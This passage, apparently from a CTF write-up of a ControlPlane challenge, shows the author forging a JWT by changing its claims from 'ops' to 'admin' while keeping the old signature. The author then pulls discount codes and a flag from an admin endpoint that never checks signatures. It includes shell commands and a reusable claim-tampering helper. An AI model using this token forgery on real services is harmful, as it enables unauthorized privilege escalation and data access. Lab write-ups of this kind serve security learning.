$ curl -H "Authorization: Bearer $ID_TOKEN" http://discount-datastore.backend-services:5000/api/v1/datastore/info

{"records":"Cabby Route Discount Codes","count":4,"regions":"eu-west-2","availability":true}

Yeah, OK, we need admin credentials. So far, we only have ops. I spent quite a bit of time searching for credentials to no avail.

Eventually, I thought… could there be an issue with JWT parsing? Could we forge a token and have the signature ignored? A JWT is three base64url-encoded blocks joined with dots: the first is the header, the second contains the claims, and the third is the signature that ensures the first two have not been tampered with. There have been plenty of issues historically where applications don’t validate the signature. So what if we just change ops to admin in the JWT we have?

These are the three parts:

$ echo $ID_TOKEN | tr '.' '\n'

eyJhbGciOiJSUzI1NiIsImtpZCI6ImM2NDhjZTRlYTQzYzEwMTQ0YTljN2JiMWJiMWE5MDc2NTcyZDdhNjMifQ

eyJpc3MiOiJodHRwOi8vZGV4LmRleC5zdmMuY2x1c3Rlci5sb2NhbDo1NTU2L2RleCIsInN1YiI6IkNpUkNPVU00TkVReVF5MDVRak5GTFRRek1UUXRPRE01TkMwelFrRkNNVVpGTXpJNU1EY1NCV3h2WTJGcyIsImF1ZCI6ImRpc2NvdW50LWRhdGFzdG9yZSIsImV4cCI6MTc0Mzc4MTIzNywiaWF0IjoxNzQzNjk0ODM3LCJhdF9oYXNoIjoiNzhUUXExUktuWTkwQVNYQVZzZk9SUSIsImVtYWlsIjoib3BzQGNhYmJ5LXJvdXRlLmxvY2FsIiwiZW1haWxfdmVyaWZpZWQiOnRydWUsIm5hbWUiOiJvcHMifQ

nJNFr5-QpO2Z1NGjj1N4zPI2nnlw2NEwLqE6nJ35sc4zPExFxe9n3P13dEaTU5PuC43gFMu2ww-SxyrvUcad2xP1EnMu4U8QpAYLEDHc6ily6I66oseCcsm-uP-1LF9QvIqqMGwYrUxUOXicifouHXtVOL4tOvj3h97YeT9cz-mak3Xg94e2K1D0WYggWPimOIhQoGfsc_2nOkF5jHZiHRimU1Wzmu3kMLss8R4zOPexifCdREuWTJVMKyITCJZ-4UNFaOWHzA8XtnnCLvowVsv-jiZB3bdt-cF4NNsleslqQmfxkgl5nYAYSU4lIDRx_qvYHgvc_6Mge9Sv6zx-4g

We can decode the second block to see:

$ base64 -d <<< eyJpc3MiOiJodHRwOi8vZGV4LmRleC5zdmMuY2x1c3Rlci5sb2NhbDo1NTU2L2RleCIsInN1YiI6IkNpUkNPVU00TkVReVF5MDVRak5GTFRRek1UUXRPRE01TkMwelFrRkNNVVpGTXpJNU1EY1NCV3h2WTJGcyIsImF1ZCI6ImRpc2NvdW50LWRhdGFzdG9yZSIsImV4cCI6MTc0Mzc4MTIzNywiaWF0IjoxNzQzNjk0ODM3LCJhdF9oYXNoIjoiNzhUUXExUktuWTkwQVNYQVZzZk9SUSIsImVtYWlsIjoib3BzQGNhYmJ5LXJvdXRlLmxvY2FsIiwiZW1haWxfdmVyaWZpZWQiOnRydWUsIm5hbWUiOiJvcHMifQ

{"iss":"http://dex.dex.svc.cluster.local:5556/dex","sub":"CiRCOUM4NEQyQy05QjNFLTQzMTQtODM5NC0zQkFCMUZFMzI5MDcSBWxvY2Fs","aud":"discount-datastore","exp":1743781237,"iat":1743694837,"at_hash":"78TQq1RKnY90ASXAVsfORQ","email":"ops@cabby-route.local","email_verified":true,"name":"ops"}base64: invalid input

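The invalid input error appears because JWT blocks are base64url-encoded with the trailing = padding stripped, while base64 -d expects it; the decoded JSON is still complete, so never mind. Let’s use sed to swap out data.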

root@jumpbox-8d7444959-xxrbr:~# base64 -d <<< eyJpc3MiOiJodHRwOi8vZGV4LmRleC5zdmMuY2x1c3Rlci5sb2NhbDo1NTU2L2RleCIsInN1YiI6IkNpUkNPVU00TkVReVF5MDVRak5GTFRRek1UUXRPRE01TkMwelFrRkNNVVpGTXpJNU1EY1NCV3h2WTJGcyIsImF1ZCI6ImRpc2NvdW50LWRhdGFzdG9yZSIsImV4cCI6MTc0Mzc4MTIzNywiaWF0IjoxNzQzNjk0ODM3LCJhdF9oYXNoIjoiNzhUUXExUktuWTkwQVNYQVZzZk9SUSIsImVtYWlsIjoib3BzQGNhYmJ5LXJvdXRlLmxvY2FsIiwiZW1haWxfdmVyaWZpZWQiOnRydWUsIm5hbWUiOiJvcHMifQ | sed 's/ops/admin/g' | base64 -w 0; echo

base64: invalid input

eyJpc3MiOiJodHRwOi8vZGV4LmRleC5zdmMuY2x1c3Rlci5sb2NhbDo1NTU2L2RleCIsInN1YiI6IkNpUkNPVU00TkVReVF5MDVRak5GTFRRek1UUXRPRE01TkMwelFrRkNNVVpGTXpJNU1EY1NCV3h2WTJGcyIsImF1ZCI6ImRpc2NvdW50LWRhdGFzdG9yZSIsImV4cCI6MTc0Mzc4MTIzNywiaWF0IjoxNzQzNjk0ODM3LCJhdF9oYXNoIjoiNzhUUXExUktuWTkwQVNYQVZzZk9SUSIsImVtYWlsIjoiYWRtaW5AY2FiYnktcm91dGUubG9jYWwiLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwibmFtZSI6ImFkbWluIn0=

Swapping out the second block and re-joining them with ., we get a new ID_TOKEN which we can try to hit the admin endpoint with.
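The decode, edit and re-join steps can be wrapped into one helper. This is only a sketch, assuming GNU coreutils base64 and single-line JSON claims; the function names `b64url_decode`, `b64url_encode` and `tamper_jwt` are made up for illustration. It only works against a service that does not verify the signature, since the original signature is reused untouched.

```shell
# Decode one base64url block, restoring the '=' padding that JWTs strip.
b64url_decode() {
  seg=$(printf '%s' "$1" | tr '_-' '/+')
  case $(( ${#seg} % 4 )) in
    2) seg="$seg==" ;;
    3) seg="$seg=" ;;
  esac
  printf '%s' "$seg" | base64 -d
}

# Encode stdin as base64url without padding or line wrapping.
b64url_encode() {
  base64 | tr -d '=\n' | tr '/+' '_-'
}

# Apply sed expression $2 to the claims of token $1.
# Header and signature are copied over unchanged.
tamper_jwt() {
  header=$(printf '%s' "$1" | cut -d. -f1)
  claims=$(printf '%s' "$1" | cut -d. -f2)
  sig=$(printf '%s' "$1" | cut -d. -f3)
  new_claims=$(b64url_decode "$claims" | sed "$2" | tr -d '\n' | b64url_encode)
  printf '%s.%s.%s\n' "$header" "$new_claims" "$sig"
}

# Example use: ID_TOKEN2=$(tamper_jwt "$ID_TOKEN" 's/ops/admin/g')
```

Unlike the token used below, this sketch strips the trailing = from the new claims block, which is the usual JWT convention; the padded version was accepted by this service regardless.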

$ export ID_TOKEN2=eyJhbGciOiJSUzI1NiIsImtpZCI6ImM2NDhjZTRlYTQzYzEwMTQ0YTljN2JiMWJiMWE5MDc2NTcyZDdhNjMifQ.eyJpc3MiOiJodHRwOi8vZGV4LmRleC5zdmMuY2x1c3Rlci5sb2NhbDo1NTU2L2RleCIsInN1YiI6IkNpUkNPVU00TkVReVF5MDVRak5GTFRRek1UUXRPRE01TkMwelFrRkNNVVpGTXpJNU1EY1NCV3h2WTJGcyIsImF1ZCI6ImRpc2NvdW50LWRhdGFzdG9yZSIsImV4cCI6MTc0Mzc4MTIzNywiaWF0IjoxNzQzNjk0ODM3LCJhdF9oYXNoIjoiNzhUUXExUktuWTkwQVNYQVZzZk9SUSIsImVtYWlsIjoiYWRtaW5AY2FiYnktcm91dGUubG9jYWwiLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwibmFtZSI6ImFkbWluIn0=.nJNFr5-QpO2Z1NGjj1N4zPI2nnlw2NEwLqE6nJ35sc4zPExFxe9n3P13dEaTU5PuC43gFMu2ww-SxyrvUcad2xP1EnMu4U8QpAYLEDHc6ily6I66oseCcsm-uP-1LF9QvIqqMGwYrUxUOXicifouHXtVOL4tOvj3h97YeT9cz-mak3Xg94e2K1D0WYggWPimOIhQoGfsc_2nOkF5jHZiHRimU1Wzmu3kMLss8R4zOPexifCdREuWTJVMKyITCJZ-4UNFaOWHzA8XtnnCLvowVsv-jiZB3bdt-cF4NNsleslqQmfxkgl5nYAYSU4lIDRx_qvYHgvc_6Mge9Sv6zx-4g

$ curl -H "Authorization: Bearer $ID_TOKEN2" http://discount-datastore.backend-services:5000/api/v1/admin/datastore/discount

[{"name":"FIRST-TIME","discount":"10%","code":"VGhhbmtzNFRoZUJ1c2luZXNzRnJlZVRyaXBPblVz"},{"name":"PROMOTION","discount":"20%","code":"U29jaWFsUHJvbW90aW9uR2V0c1lvdU1vdGlvbkFjcm9zc0xvbmRvbg=="},{"name":"FRIENDS-AND-FAMILY","discount":"25%","code":"UGVyc29uYWxDb2RlRm9yQ2FiYnlzT25seVBsZWFzZURvbnREaXN0cmlidXRlVG9QdWJsaWM="},{"name":"FLAG-DOWN","discount":"100%","code":"ZmxhZ19jdGZ7RlJFRV9SSURFU19BQ1JPU1NfTE9ORE9OX0pXVF9TSUdOQVRVUkVTX01VU1RfQkVfVkVSSUZJRUR9"}]

Niceee. There is the final flag.

$ base64 -d <<< ZmxhZ19jdGZ7RlJFRV9SSURFU19BQ1JPU1NfTE9ORE9OX0pXVF9TSUdOQVRVUkVTX01VU1RfQkVfVkVSSUZJRUR9; echo

flag_ctf{FREE_RIDES_ACROSS_LONDON_JWT_SIGNATURES_MUST_BE_VERIFIED}
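The other code values in the response are base64 as well. A rough sketch for decoding them all in one pass, assuming grep with -o support and GNU base64; `decode_codes` is a hypothetical helper, and it uses plain text matching rather than a real JSON parser.

```shell
# Hypothetical helper: read the JSON response on stdin, pull out every
# "code" value and print each one base64-decoded on its own line.
decode_codes() {
  grep -o '"code":"[^"]*"' | cut -d'"' -f4 | while IFS= read -r code; do
    printf '%s' "$code" | base64 -d
    echo
  done
}

# Example use (needs access to the service, so left commented out):
# curl -s -H "Authorization: Bearer $ID_TOKEN2" \
#   http://discount-datastore.backend-services:5000/api/v1/admin/datastore/discount | decode_codes
```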

I agree with ControlPlane: I enjoyed this one the most of the three challenges.

Conclusions

Once again, ControlPlane have made quite a fun CTF. The storylines within challenges aren’t as prominent as they have been in previous CTFs, but as always I learnt quite a bit doing them. It was also my first time messing around with Tetragon.

Once again, I managed to complete it all first. Let’s see if there is a prize this time 😂